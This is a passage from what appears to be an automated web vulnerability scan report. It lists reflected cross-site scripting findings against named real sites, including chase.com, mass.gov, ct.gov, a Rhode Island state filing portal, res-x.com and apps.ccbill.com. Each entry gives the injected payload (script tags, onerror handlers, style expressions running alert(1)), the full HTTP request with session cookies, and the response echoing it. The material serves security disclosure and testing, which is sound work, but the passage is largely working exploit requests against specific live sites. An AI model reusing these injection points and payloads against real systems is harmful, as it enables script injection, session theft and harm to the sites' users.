Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:48:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 3894
Content-Type: text/html
Expires: Tue, 12 Jul 2011 00:48:22 GMT
Cache-control: no-cache


<SCRIPT LANGUAGE="JavaScript">
// <!--
var Worklist = ""
if (Worklist != "True"){
window.location = "http://ucc.state.ri.us/loginsystem/login_form.asp";
}
if (Worklist == "True"){
window.location = "http://ucc.state.ri.us/loginsystem/login_form.asp?FilingMethod=6d411";alert(1)//2d4c3ef54be&PDF=&FilingTypeCD=&Process=&FilingMethodDate=&BatchNum=&DocumentNum=&SeqNum=";
}
// -->
...[SNIP]...

3.20. http://ucc.state.ri.us/ucc/uccmenu.asp [FilingMethod parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ucc.state.ri.us
Path:   /ucc/uccmenu.asp

Issue detail

The value of the FilingMethod request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ad54"style%3d"x%3aexpression(alert(1))"616bc28074f was submitted in the FilingMethod parameter. This input was echoed as 3ad54"style="x:expression(alert(1))"616bc28074f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /ucc/uccmenu.asp?FilingMethod=I3ad54"style%3d"x%3aexpression(alert(1))"616bc28074f HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:47:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 7353
Content-Type: text/html
Expires: Wed, 13 Jul 2011 00:46:02 GMT
Cache-control: no-cache


<html>
<head>
<script LANGUAGE="JavaScript">
<!--
function ucc3() {
if (document.UCCMenu.UCC3MENU.value=='0') {
alert('You have to select a correct UCC3 type in the list box!');
return false;
...[SNIP]...
<input type="hidden" name="FilingMethod" value="I3ad54"style="x:expression(alert(1))"616bc28074f">
...[SNIP]...

3.21. https://www.chase.com/ccp/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.chase.com
Path:   /ccp/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29263"%20a%3db%209ef85dbd58f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29263" a=b 9ef85dbd58f in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ccp/index.jsp?pg_name=ccpmapp/smallbusiness/business_banking/page/bb_checking_overview&29263"%20a%3db%209ef85dbd58f=1 HTTP/1.1
Host: www.chase.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; DCTMSESSION=zrCbTczJG7b5gdC2pkJLRXST1yLZ7DJLL5Mmcv9PzCS1PvTnvVJV!1300205596; s_cc=true; s_sq=jpmcchasecom%3D%2526pid%253Dhttps%25253A//www.chase.com/ccp/index.jsp%25253Fpg_name%25253Dccpmapp/individuals/shared/page/OpenAnAccount%2526oid%253Dhttp%25253A//www.chase.com/ccp/index.jsp%25253Fpg_name%25253Dccpmapp/smallbusiness/business_banking/page/bb_checking_o%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Tue, 12 Jul 2011 16:16:49 GMT
Content-length: 12080
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Connection: close


<html LANG="EN" >


<head>


<link rel='stylesheet' type='text/css' href='/ccpmweb/shared/document/content.css'/>
<script language='Javas
...[SNIP]...
<form name="zipForm" method="post" action="/index.jsp?pg_name=ccpmapp/smallbusiness/business_banking/page/bb_checking_overview&29263" a=b 9ef85dbd58f=1" onsubmit="return validateZip()">
...[SNIP]...

3.22. https://www.chase.com/ccp/index.jsp [targeturl parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.chase.com
Path:   /ccp/index.jsp

Issue detail

The value of the targeturl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13971"%20a%3db%2077310f0ae36 was submitted in the targeturl parameter. This input was echoed as 13971" a=b 77310f0ae36 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ccp/index.jsp?pg_name=ccpmapp/shared/assets/page/zipcode&targeturl=https%3A%2F%2Fwww.chase.com%3A443%2Findex.jsp%3Fpg_name%3Dccpmapp%2Fsmallbusiness%2Fbusiness_banking%2Fpage%2Fbb_checking_overview13971"%20a%3db%2077310f0ae36 HTTP/1.1
Host: www.chase.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; DCTMSESSION=zrCbTczJG7b5gdC2pkJLRXST1yLZ7DJLL5Mmcv9PzCS1PvTnvVJV!1300205596; s_cc=true; s_sq=jpmcchasecom%3D%2526pid%253Dhttps%25253A//www.chase.com/ccp/index.jsp%25253Fpg_name%25253Dccpmapp/individuals/shared/page/OpenAnAccount%2526oid%253Dhttp%25253A//www.chase.com/ccp/index.jsp%25253Fpg_name%25253Dccpmapp/smallbusiness/business_banking/page/bb_checking_o%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Tue, 12 Jul 2011 16:16:44 GMT
Content-length: 10005
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Connection: close


<html LANG="EN" >


<head>


<link rel='stylesheet' type='text/css' href='/ccpmweb/shared/document/content.css'/>
<script language='Javas
...[SNIP]...
<form name="zipForm" method="post" action="/index.jsp?pg_name=ccpmapp/smallbusiness/business_banking/page/bb_checking_overview13971" a=b 77310f0ae36" onsubmit="return validateZip()">
...[SNIP]...

3.23. https://www.chase.com/index.jsp [targeturl parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.chase.com
Path:   /index.jsp

Issue detail

The value of the targeturl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e26b3"%3b99845ba5733 was submitted in the targeturl parameter. This input was echoed as e26b3";99845ba5733 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /index.jsp?pg_name=ccpmapp/smallbusiness/business_banking/page/bb_checking_overview HTTP/1.1
Host: www.chase.com
Connection: keep-alive
Referer: https://www.chase.com/ccp/index.jsp?pg_name=ccpmapp/shared/assets/page/zipcode&targeturl=https%3A%2F%2Fwww.chase.com%3A443%2Findex.jsp%3Fpg_name%3Dccpmapp%2Fsmallbusiness%2Fbusiness_banking%2Fpage%2Fbb_checking_overview
Content-Length: 200
Cache-Control: max-age=0
Origin: https://www.chase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; DCTMSESSION=zrCbTczJG7b5gdC2pkJLRXST1yLZ7DJLL5Mmcv9PzCS1PvTnvVJV!1300205596; s_cc=true; s_sq=jpmcchasecom%3D%2526pid%253Dhttps%25253A//www.chase.com/ccp/index.jsp%25253Fpg_name%25253Dccpmapp/individuals/shared/page/OpenAnAccount%2526oid%253Dhttp%25253A//www.chase.com/ccp/index.jsp%25253Fpg_name%25253Dccpmapp/smallbusiness/business_banking/page/bb_checking_o%2526ot%253DA

targeturl=https%253A%252F%252Fwww.chase.com%253A443%252Findex.jsp%253Fpg_name%253Dccpmapp%252Fsmallbusiness%252Fbusiness_banking%252Fpage%252Fbb_checking_overviewe26b3"%3b99845ba5733&zipcode=10011&submit.x=19&submit.y=13

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Tue, 12 Jul 2011 16:28:01 GMT
Content-length: 3744
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Set-Cookie: DCTMSESSION=QfWyTc2RvFLRQppGpZ6LcpGKfcRny7D80FmKFh1lRBHJGpTCpSvS!792762552; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
>
<html lang="en">
<HEAD>
<TITLE>
</TITLE>
<script language="JavaScript">


//-----------------------------------
...[SNIP]...
11*/
/*Modified for Prod issue 15591751: ref: WO 108711*/
document.location = "https://www.chase.com:443/index.jsp?pg_name=ccpmapp/smallbusiness/business_banking/page/bb_checking_overviewe26b3";99845ba5733";
/*End Modified for Prod issue: ref: WO 108711*/

}

//----------------------------------------------------------------------
function processCookieOnSuccess()
{
DeleteCookiesOnSu
...[SNIP]...

3.24. https://www.chase.com/index.jsp [zipcode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.chase.com
Path:   /index.jsp

Issue detail

The value of the zipcode request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d9ea6%3balert(1)//816b0d67af5c2d49c was submitted in the zipcode parameter. This input was echoed as d9ea6;alert(1)//816b0d67af5c2d49c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.jsp?pg_name=ccpmapp/smallbusiness/business_banking/page/bb_checking_overview&29263=&targeturl=https%253A%252F%252Fwww.chase.com%253A443%252Findex.jsp%253Fpg_name%253Dccpmapp%252Fsmallbusiness%252Fbusiness_banking%252Fpage%252Fbb_checking_overview%252629263%2522%2Ba%253Db%2B9ef85dbd58f%253D1&zipcode=10011d9ea6%3balert(1)//816b0d67af5c2d49c&submit.x=33&submit.y=5 HTTP/1.1
Host: www.chase.com
Connection: keep-alive
Referer: https://www.chase.com/ccp/index.jsp?pg_name=ccpmapp/smallbusiness/business_banking/page/bb_checking_overview&29263%22%20a%3db%209ef85dbd58f=1
Cache-Control: max-age=0
Origin: https://www.chase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; DCTMSESSION=zrCbTczJG7b5gdC2pkJLRXST1yLZ7DJLL5Mmcv9PzCS1PvTnvVJV!1300205596; s_cc=true; s_sq=

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Tue, 12 Jul 2011 16:18:26 GMT
Content-length: 3784
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
>
<html lang="en">
<HEAD>
<TITLE>
</TITLE>
<script language="JavaScript">


//-----------------------------------
...[SNIP]...
s = 60*1000;
///Negative expiration time set for the timeout cookie to make it session cookie
var marketlistExpiration = null ;

SetCookieOnSuccess("chasezip","zipcode=10011d9ea6;alert(1)//816b0d67af5c2d49c&state=NY&county=New York", zipExpiration, "/",".chase.com");


//new cookie code

SetCookieOnSuccess("marketlist","68|90|152|170|198", marketlistExpiration, "/",".chase.com");
...[SNIP]...

3.25. http://www.ct.gov/demhs/site/default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ct.gov
Path:   /demhs/site/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9af27"><script>alert(1)</script>5bc6d1e79b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /demhs/site/default.asp?9af27"><script>alert(1)</script>5bc6d1e79b1=1 HTTP/1.1
Host: www.ct.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 00:39:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 31253
Content-Type: text/html
Set-Cookie: demhs=SA=False&EA=&SSL=False&F=CE83CBC6&NB=False&II=&ILO=False&FN=Guest&TU=CF83CBC7&CA=CF83CBC7&TC=06105&AN=&AG=&Q=CF83CBC7&PGT=&UA=Guest&LoginJumpBackTo=%2Fdemhs%2Fsite%2Fdefault%2Easp&AA=False; domain=www.ct.gov; path=/demhs
Set-Cookie: demhsNav=; path=/demhs
Set-Cookie: demhsNav%5FGID=; path=/demhs
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML LANG="en-us">
   <DSFHEADER>
   <!--stopindex-->
   <HEAD>

       <!--
           This site was built with PPT DSF Technology
       Dynamic S
...[SNIP]...
<a href="/demhs/site/default.asp?9af27"><script>alert(1)</script>5bc6d1e79b1=1&demhsNav=|42956|">
...[SNIP]...

3.26. http://www.mass.gov/ [L2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mass.gov
Path:   /

Issue detail

The value of the L2 request parameter is copied into the HTML document as text between TITLE tags. The payload 1b834</title><script>alert(1)</script>38aa81172fd was submitted in the L2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?pageID=eopsagencylanding&L=3&sid=Eeops&L0=Home&L1=Public+Safety+Agencies&L2=Massachusetts+Emergency+Management+Agency1b834</title><script>alert(1)</script>38aa81172fd HTTP/1.1
Host: www.mass.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:39:32 GMT
Server: Apache/2.0.46 (Red Hat)
Cache-Control: no-cache, max-age=300
Expires: Wed, 13 Jul 2011 00:44:32 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9064


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
   <meta http-equiv="Content-Type" content="text/
...[SNIP]...
<title>Massachusetts Emergency Management Agency1b834</title><script>alert(1)</script>38aa81172fd - Executive Office of Public Safety</title>
...[SNIP]...

3.27. http://www.mass.gov/ [L3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mass.gov
Path:   /

Issue detail

The value of the L3 request parameter is copied into the HTML document as text between TITLE tags. The payload fba97</title><script>alert(1)</script>d6ae32a62b8 was submitted in the L3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?pageID=ocasubtopic&L=4&L0=Home&L1=Consumer&L2=Housing+Information&L3=Foreclosure+Resourcesfba97</title><script>alert(1)</script>d6ae32a62b8&sid=Eoca HTTP/1.1
Host: www.mass.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mass.gov/?pageID=mg2homepage&L=1&L0=Home&sid=massgov2
Cookie: fsr.s={"v":1,"rid":"1310517722924_648675","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","cp":{"massgov2":"Visited","Deas":"No","Eveterans":"No","Eelders":"No","Eeohhs2":"No","Eoca":"No","Dmdaa":"No","Sessex":"No","Cago":"No","Eeops":"Visited","Aosc":"No","Ador":"No","Agov3":"No","Ihqcc":"No","Elwd":"No","Ehed":"No","Smsa":"No","Idppc":"No","Ctre":"No","Eeoe":"No","Eoeea":"No","Dber":"No","Eoaf":"No","Ieth":"No","Fstim":"No"},"pv":2,"to":5,"c":"http://www.mass.gov/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1310517726738}; __utma=255208596.1158802016.1310517723.1310517723.1310517723.1; __utmb=255208596.2.10.1310517723; __utmc=255208596; __utmz=255208596.1310517723.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:44:56 GMT
Server: Apache/2.0.46 (Red Hat)
Cache-Control: no-cache, max-age=300
Expires: Wed, 13 Jul 2011 00:49:56 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7576


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
   <meta http-equiv="Content-Type" content="text/
...[SNIP]...
<title>Foreclosure Resourcesfba97</title><script>alert(1)</script>d6ae32a62b8 - Office of Consumer Affairs and Business Regulation</title>
...[SNIP]...

3.28. http://www.res-x.com/ws/r2/Resonance.aspx [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.res-x.com
Path:   /ws/r2/Resonance.aspx

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 89fa3<img%20src%3da%20onerror%3dalert(1)>512095e9e2b was submitted in the cb parameter. This input was echoed as 89fa3<img src=a onerror=alert(1)>512095e9e2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ws/r2/Resonance.aspx?appid=HOMEDEPOT01&tk=345519762253388&ss=877035136567428&sg=1&pg=800586763303726&bx=true&vr=2.69&sc=search_rr&cu=287408220&ct=&no=3&cb=r1eh89fa3<img%20src%3da%20onerror%3dalert(1)>512095e9e2b&clk=&ur=http%3A//www.homedepot.com/webapp/wcs/stores/servlet/Search%3Fkeyword%3Dxss%26selectedCatgry%3DSEARCH+ALL%26langId%3D-1%26storeId%3D10051%26catalogId%3D10053&plk=202349120;202571062;202349118;202571024;202571026;202571029;202571027;202571025;202571023;202571028;202349088;202349089;202349087;100661424;&rf=http%3A//www.homedepot.com/ HTTP/1.1
Host: www.res-x.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/Search?keyword=xss&selectedCatgry=SEARCH+ALL&langId=-1&storeId=10051&catalogId=10053
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=r3vcat55x0xldvufmhh0m545; NSC_wjq-ipnfefqpu=ffffffffc3a01e5745525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR CUR PSA PSD OUR IND UNI"
Date: Tue, 12 Jul 2011 16:45:10 GMT
Content-Length: 3298

r1eh89fa3<img src=a onerror=alert(1)>512095e9e2b({"Resonance":{"Response":[{"scheme":"search_rr","display":"yes","output":"<div id=\"accessories\"><div id=\"add-ons\" class=\"col\"><div id=\"ymal_vert
...[SNIP]...

3.29. http://www.res-x.com/ws/r2/Resonance.aspx [sc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.res-x.com
Path:   /ws/r2/Resonance.aspx

Issue detail

The value of the sc request parameter is copied into the HTML document as plain text between tags. The payload afeb2<img%20src%3da%20onerror%3dalert(1)>543645a44e was submitted in the sc parameter. This input was echoed as afeb2<img src=a onerror=alert(1)>543645a44e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ws/r2/Resonance.aspx?appid=HOMEDEPOT01&tk=345519762253388&ss=877035136567428&sg=1&pg=800586763303726&bx=true&vr=2.69&sc=search_rrafeb2<img%20src%3da%20onerror%3dalert(1)>543645a44e&cu=287408220&ct=&no=3&cb=r1eh&clk=&ur=http%3A//www.homedepot.com/webapp/wcs/stores/servlet/Search%3Fkeyword%3Dxss%26selectedCatgry%3DSEARCH+ALL%26langId%3D-1%26storeId%3D10051%26catalogId%3D10053&plk=202349120;202571062;202349118;202571024;202571026;202571029;202571027;202571025;202571023;202571028;202349088;202349089;202349087;100661424;&rf=http%3A//www.homedepot.com/ HTTP/1.1
Host: www.res-x.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/Search?keyword=xss&selectedCatgry=SEARCH+ALL&langId=-1&storeId=10051&catalogId=10053
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=r3vcat55x0xldvufmhh0m545; NSC_wjq-ipnfefqpu=ffffffffc3a01e5745525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR CUR PSA PSD OUR IND UNI"
Date: Tue, 12 Jul 2011 16:44:59 GMT
Content-Length: 138

r1eh({"Resonance":{"Response":[{"scheme":"search_rrafeb2<img src=a onerror=alert(1)>543645a44e","display":"no","output":"<div></div>"}]}})

3.30. http://apps.ccbill.com/ [cookieLetterSize cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.ccbill.com
Path:   /

Issue detail

The value of the cookieLetterSize cookie is copied into an HTML comment. The payload a7caa--><script>alert(1)</script>e7b3059ecf4 was submitted in the cookieLetterSize cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET / HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/General-Website-Tools/Send-ACH-through-CCBill-l13.html
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.5.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1; cookiePageWidth=920px; cookieLetterSize=1ema7caa--><script>alert(1)</script>e7b3059ecf4; box_content_20=block; box_content_21=block; box_content_6=block; box_content_22=block; first=foo

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:04:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Drectory-Script: eSyndiCat Pro v2.3.02
Content-Type: text/html; charset=utf-8
Content-Length: 19510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<div class="page" style=" width: 920px; font-size: 1ema7caa--><script>alert(1)</script>e7b3059ecf4;">
...[SNIP]...

3.31. http://apps.ccbill.com/ [cookiePageWidth cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.ccbill.com
Path:   /

Issue detail

The value of the cookiePageWidth cookie is copied into an HTML comment. The payload 430a3--><script>alert(1)</script>a94cfc1175f was submitted in the cookiePageWidth cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

